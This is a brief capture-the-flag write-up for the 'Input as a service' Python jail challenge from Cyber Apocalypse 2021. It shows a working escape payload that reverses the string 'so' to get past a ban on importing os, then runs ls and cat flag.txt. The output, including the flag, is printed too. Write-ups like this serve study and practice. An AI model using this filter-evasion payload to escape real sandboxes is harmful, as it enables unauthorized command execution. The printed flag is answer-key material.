Cyber Apocalypse 2021

Input as a service

Solved by : ava

• We are given a py-jail
• https://programmer.help/blogs/python-sandbox-escape.html
• I used this website as reference, os and such imports are banned, so we used string manipulation
• we just reverse the string os to so and import it and then do ls command to * * see the flag.txt and then just cat the flag
• the code to do is given below

__import__('so'[::-1]).system('ls')


flag.txt
input_as_a_service.py


__import__('so'[::-1]).system('cat flag.txt')

CHTB{4li3n5_us3_pyth0n2.X?!}